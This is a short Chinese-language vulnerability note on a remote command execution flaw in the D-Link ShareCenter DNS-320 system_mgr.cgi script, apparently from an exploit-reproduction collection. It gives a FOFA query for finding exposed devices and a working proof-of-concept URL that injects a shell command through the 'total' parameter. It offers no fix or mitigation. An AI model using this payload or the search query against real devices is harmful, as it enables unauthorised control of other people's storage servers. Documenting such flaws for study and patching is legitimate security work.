# D-Link ShareCenter DNS-320 system\_mgr.cgi 远程命令执行漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

D-Link ShareCenter DNS-320 system\_mgr.cgi 存在远程命令执行，攻击者通过漏洞可以控制服务器

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

D-Link ShareCenter DNS-320

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

app="D\_Link-DNS-ShareCenter"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1o2CpipynI6qWEkQ%2Fimage.png?alt=media\&token=6b97b7c9-2ca7-48fd-bfa7-1dbf765717b2)

漏洞POC为

```
/cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls;
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1rNJTDSaEFECjEUH%2Fimage.png?alt=media\&token=fa125a45-1a70-49e2-817e-426acaa93108)